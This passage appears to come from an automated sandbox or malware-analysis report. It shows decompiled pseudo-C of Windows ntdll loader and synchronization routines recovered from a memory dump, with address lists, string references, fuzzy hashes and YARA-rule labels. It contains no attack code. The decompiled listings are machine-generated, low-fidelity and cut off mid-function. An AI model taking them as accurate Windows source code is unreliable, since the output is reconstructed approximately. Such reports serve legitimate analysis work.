								E00F1B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00f27e4c
0x00f27e50
0x00f27e55
0x00f27e58
0x00f27e5d
0x00f27e71
0x00f27f33
0x00f27e77
0x00f27e77
0x00f27e79
0x00f27e79
0x00f27e7e
0x00f27f45
0x00f79848
0x00000000
0x00f79848
0x00f27f4e
0x00f27f53
0x00f27f5a
0x00000000
0x00000000
0x00f7985a
0x00f79862
0x00f79866
0x00000000
0x00f7986c
0x00000000
0x00f7986c
0x00f27e84
0x00f27e84
0x00f27e8d
0x00f79871
0x00f27eb8
0x00f27ec0
0x00f27ec0
0x00f27e9a
0x00f7987e
0x00000000
0x00000000
0x00f79884
0x00f7988b
0x00f798a7
0x00f798ac
0x00f798b1
0x00f798b6
0x00f798b8
0x00f798b8
0x00f798b9
0x00000000
0x00f798b9
0x00f27ea0
0x00f27ea7
0x00000000
0x00000000
0x00f27eac
0x00f27eb1
0x00f27ec6
0x00f27ed0
0x00f798cc
0x00f27ed6
0x00f27ed6
0x00f27ed6
0x00f27ede
0x00f27ee3
0x00f798e3
0x00f798f0
0x00f79902
0x00f798f2
0x00f798fb
0x00f798fb
0x00f79907
0x00f7991d
0x00f7991d
0x00f79907
0x00f798e3
0x00f27ef0
0x00f27f14
0x00f27f14
0x00f27f1e
0x00f79946
0x00f27f24
0x00f27f24
0x00f27f24
0x00f27f2c
0x00f7996a
0x00f79975
0x00f79975
0x00f7997e
0x00f79993
0x00f79993
0x00f7997e
0x00000000
0x00f27ef2
0x00f27efc
0x00f27f0a
0x00f27f0e
0x00f79933
0x00000000
0x00f79933
0x00000000
0x00f27f0e
0x00000000
0x00000000
0x00000000
0x00f27eb1

Strings

LdrpCompleteMapModule, xrefs: 00F79898
minkernel\ntdll\ldrmap.c, xrefs: 00F798A2
Could not validate the crypto signature for DLL %wZ, xrefs: 00F79891
RegLoadRegistryInfo, xrefs: 00F27EA0, 00F79855

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$RegLoadRegistryInfo$minkernel\ntdll\ldrmap.c
API String ID: 0-4119253279
Opcode ID: cab91b0a2f8687a6f41da372c41beac86e073202a2565c45e40bf7a620291db6
Instruction ID: 2ddb8586a6b337251d4e059ea13c55ef8b8d98f62289ca3b59a2bf43d4ace5fa
Opcode Fuzzy Hash: cab91b0a2f8687a6f41da372c41beac86e073202a2565c45e40bf7a620291db6
Instruction Fuzzy Hash: AE515532A0CB449BEB21EB58D945B2A77E0FF01320F15019AE9559B3E1C774EC00EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F48E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00F48E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x100d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1008464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1005780 & 0x00000003) != 0) {
							E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1005780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00F5B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1007984; // 0xaa2bb8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1008464; // 0x75150110
					 *0x100b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00F49B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1005780 & 0x00000005) != 0) {
						_push(_t49);
						E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00f48e0f
0x00f48e16
0x00f48e19
0x00f48e1b
0x00f48e21
0x00f48e7f
0x00f48e85
0x00f89354
0x00f8936c
0x00f89371
0x00f8937b
0x00f89381
0x00f89381
0x00f8937b
0x00f48e9d
0x00f48e9d
0x00f48e29
0x00f48e2c
0x00f48e38
0x00f48e3e
0x00f48e43
0x00f48eb5
0x00f48eb9
0x00f892aa
0x00f892af
0x00f892e8
0x00f892e8
0x00f892af
0x00f48eb9
0x00f48e45
0x00f48e53
0x00f48e5b
0x00f48e5f
0x00f48e78
0x00f48e78
0x00f48e7d
0x00f48ec3
0x00f48ecd
0x00f48ed2
0x00f48ed2
0x00f48ec5
0x00f48ec5
0x00000000
0x00f48e7d
0x00f48e67
0x00f48ea4
0x00f8931a
0x00000000
0x00000000
0x00f89320
0x00f48ea4
0x00f48e70
0x00f89325
0x00f89340
0x00f89345
0x00f89345
0x00f48e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 00F89357
LdrpFindDllActivationContext, xrefs: 00F89331, 00F8935D
minkernel\ntdll\ldrsnap.c, xrefs: 00F8933B, 00F89367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00F8932A

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: eacc8e41146ea3e56c70c40d714b43793c54c9f481519b5d7b541bba64389b42
Instruction ID: c265cec4c4aa0459532022d460268b5b47795f28cfe01c11c6206b0ebac95a13
Opcode Fuzzy Hash: eacc8e41146ea3e56c70c40d714b43793c54c9f481519b5d7b541bba64389b42
Instruction Fuzzy Hash: DF412B32E003159FDB36AB98C849B7D7AB4BB107E4F094169ED4467191EF74ACC1B381

Uniqueness

Uniqueness Score: -1.00%

Function 00F1E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F1E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00F1F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00F595D0();
						}
						if(_t78 != 0) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00F5FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00F5BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00F59600();
					if(_t97 < 0) {
						goto L6;
					}
					E00F5BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00F1F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00F5BB40(_t83, _t102 + 0x24, _t78);
								if(L00F243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00F5BB40(_t84, _t102 + 0x24, _t94);
									if(L00F243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00f1e620
0x00f1e628
0x00f1e62f
0x00f1e631
0x00f1e635
0x00f1e637
0x00f1e63e
0x00f75503
0x00f75503
0x00f1e64c
0x00f1e64c
0x00f1e651
0x00000000
0x00000000
0x00f1e661
0x00f1e665
0x00f7542a
0x00f1e715
0x00f1e71a
0x00f1e71c
0x00f1e720
0x00f1e720
0x00f1e727
0x00f1e736
0x00f1e736
0x00f1e743
0x00f1e743
0x00f1e673
0x00f1e678
0x00f1e67d
0x00f1e682
0x00f1e685
0x00f1e692
0x00f1e69b
0x00f1e6a3
0x00f1e6ad
0x00f1e6b1
0x00f1e6b2
0x00f1e6bb
0x00f1e6bf
0x00f1e6c0
0x00f1e6c8
0x00f1e6cc
0x00f1e6d5
0x00f1e6d9
0x00000000
0x00000000
0x00f1e6e5
0x00f1e6ea
0x00f1e6f9
0x00f1e70b
0x00f1e70f
0x00f75439
0x00f7545e
0x00f7545e
0x00000000
0x00f7545e
0x00f7543b
0x00f7543e
0x00f75440
0x00f75445
0x00f75472
0x00f75475
0x00f7548d
0x00f75493
0x00f754a9
0x00000000
0x00000000
0x00f754ab
0x00f754b4
0x00f754bc
0x00f754c8
0x00f754de
0x00f754fb
0x00f754e0
0x00f754e6
0x00f754eb
0x00f754eb
0x00f754de
0x00000000
0x00f754bc
0x00f75477
0x00f7547a
0x00f75480
0x00f75483
0x00f75486
0x00f7548b
0x00000000
0x00000000
0x00000000
0x00f7548b
0x00000000
0x00000000
0x00000000
0x00000000
0x00f75447
0x00f75447
0x00f75447
0x00f75447
0x00f7544e
0x00000000
0x00000000
0x00f75450
0x00f75452
0x00f75455
0x00f7545a
0x00000000
0x00000000
0x00000000
0x00f7545c
0x00f7546a
0x00f7546d
0x00f7546f
0x00000000
0x00f7546f
0x00f1e70f

Strings

@, xrefs: 00F1E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F1E68C
InstallLanguageFallback, xrefs: 00F1E6DB

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: a30b53342e85d815b6b0725d45f6488e4b209bd19d41ad6233ae168603251736
Instruction ID: 6c9e792363f6d8c825cf4a0770a9181bcb8738195b85bf02e75b88b389f2b83d
Opcode Fuzzy Hash: a30b53342e85d815b6b0725d45f6488e4b209bd19d41ad6233ae168603251736
Instruction Fuzzy Hash: 6151D1729087059BD710DF24C850AABB3E8BF88B25F04492EF999D7240F774DD48E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00FDE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FDE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E00FDBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E00FDBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E00FDAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00F59730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E00FDA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E00FDA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00F59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E00FDA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E00FDA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00F32280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00F2B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00F2FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00F37D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E00FCFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x00fde547
0x00fde549
0x00fde54f
0x00fde553
0x00fde557
0x00fde55a
0x00fde55c
0x00fde55f
0x00fde561
0x00fde567
0x00fde56b
0x00fde7e2
0x00000000
0x00fde571
0x00fde575
0x00fde577
0x00fde57b
0x00fde57c
0x00fde57d
0x00fde57e
0x00fde57f
0x00fde588
0x00fde58f
0x00fde591
0x00fde592
0x00fde592
0x00fde596
0x00fde59e
0x00fde5a0
0x00fde5a6
0x00fde61d
0x00fde61d
0x00fde621
0x00fde623
0x00fde630
0x00fde630
0x00fde7e6
0x00fde7eb
0x00fde7ed
0x00fde7f4
0x00fde7fa
0x00fde7ff
0x00fde7ff
0x00fde80a
0x00fde812
0x00fde812
0x00fde5ab
0x00fde5b4
0x00fde5b9
0x00fde5be
0x00fde5c0
0x00fde5c2
0x00fde5c8
0x00fde5c9
0x00fde5cb
0x00fde5cc
0x00fde5d5
0x00fde5e4
0x00fde5f1
0x00fde5f8
0x00fde5f8
0x00fde5d5
0x00fde602
0x00fde616
0x00fde63d
0x00fde644
0x00fde64d
0x00fde652
0x00fde657
0x00fde659
0x00fde65b
0x00fde661
0x00fde662
0x00fde664
0x00fde665
0x00fde66e
0x00fde67d
0x00fde68a
0x00fde691
0x00fde691
0x00fde66e
0x00fde6b0
0x00000000
0x00fde6b6
0x00fde6bd
0x00fde6c7
0x00fde6d7
0x00fde6d9
0x00fde6db
0x00fde6de
0x00fde6e3
0x00fde6f3
0x00fde6fc
0x00fde700
0x00fde700
0x00fde704
0x00fde70a
0x00fde70a
0x00fde713
0x00fde716
0x00fde719
0x00fde720
0x00fde761
0x00fde76b
0x00fde774
0x00fde77a
0x00fde77a
0x00fde78a
0x00fde791
0x00fde799
0x00fde79b
0x00fde79f
0x00fde7aa
0x00fde7c0
0x00fde7ac
0x00fde7b2
0x00fde7b9
0x00fde7b9
0x00fde7c7
0x00fde806
0x00000000
0x00fde7c9
0x00fde7d1
0x00fde7d8
0x00000000
0x00fde7d8
0x00000000
0x00000000
0x00fde722
0x00fde72e
0x00fde748
0x00fde74c
0x00fde754
0x00fde756
0x00fde75c
0x00fde75c
0x00000000
0x00fde75c
0x00fde758
0x00fde758
0x00000000
0x00fde758
0x00fde750
0x00000000
0x00000000
0x00fde752
0x00000000
0x00fde752
0x00fde730
0x00fde735
0x00fde73d
0x00fde73f
0x00000000
0x00000000
0x00fde741
0x00fde741
0x00000000
0x00fde741
0x00fde739
0x00000000
0x00000000
0x00fde73b
0x00000000
0x00fde73b
0x00fde722
0x00fde720
0x00fde6b0
0x00fde618
0x00000000
0x00fde618

Strings

`, xrefs: 00FDE5D7
`, xrefs: 00FDE670

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 659040c1fba59326dfa927a3fc1f4fc121b08c908d2c13253dc2d6f85bcaf7d1
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: BA919F326043419BE764EE25CD41B1BB7E6BF84724F18892EF9A5CB380D774E804EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F12D8A, Relevance: 2.7, Strings: 2, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00F12D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1005350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1007bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00F597C0();
				}
				if( *0x10079c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x10079c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & "RegLoadRegistryInfo";
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00F41624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00F37D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00FAFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00F59520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00F4E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L00F6DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1006901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1006901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00F59980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00F595D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00F37D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00F37D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00F97016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00FAFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1005350;
							if(_t109 != 0x1005350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00FAFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00FA5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00f12d8a
0x00f12d8a
0x00f12d92
0x00f12d96
0x00f12d9e
0x00f12da0
0x00f12da3
0x00f12da5
0x00f12da8
0x00f12dab
0x00f12db2
0x00f6f9aa
0x00f6f9ab
0x00f6f9ae
0x00f6f9ae
0x00f12db8
0x00f12dc2
0x00f6f9b9
0x00f6f9be
0x00f6f9bf
0x00f6f9bf
0x00f12dcf
0x00f6f9c9
0x00f12dd5
0x00f12dd5
0x00f12dd5
0x00f12dde
0x00f12de1
0x00f12e70
0x00f12e72
0x00f12e72
0x00f12de7
0x00f12deb
0x00f12e7c
0x00f12e83
0x00f12e85
0x00f12e8b
0x00f12e8d
0x00f12e92
0x00f12e92
0x00f12e85
0x00f12df1
0x00f12df7
0x00f12df9
0x00f12df9
0x00f12dfc
0x00f12dff
0x00f12e02
0x00000000
0x00f12e05
0x00f12e0c
0x00f6f9d9
0x00f12e12
0x00f12e12
0x00f12e12
0x00f12e1a
0x00f6f9e3
0x00f6f9e9
0x00f6f9f0
0x00f6f9f6
0x00f6f9f8
0x00f6f9f8
0x00f6f9f0
0x00f12e23
0x00f6fa02
0x00f6fa03
0x00f6fa05
0x00f6fa06
0x00000000
0x00f12e29
0x00f12e29
0x00f12e2e
0x00f12e34
0x00f12e3e
0x00000000
0x00000000
0x00f12e44
0x00f12e47
0x00f12e4d
0x00000000
0x00000000
0x00f12e4f
0x00f12e54
0x00000000
0x00000000
0x00f12e5a
0x00f12e5f
0x00f12e9a
0x00f12ea4
0x00f12ea5
0x00f12ea8
0x00f12eaf
0x00f12eb2
0x00f12eb5
0x00f6fae9
0x00f6faeb
0x00f6faed
0x00f6faef
0x00f6faf7
0x00f6faf8
0x00f6fafd
0x00f6faff
0x00f6fb04
0x00f6fb04
0x00f6faff
0x00f12ec0
0x00f12ec4
0x00f12ec6
0x00f12ec8
0x00f6fb14
0x00f6fb18
0x00f6fb1e
0x00f6fb21
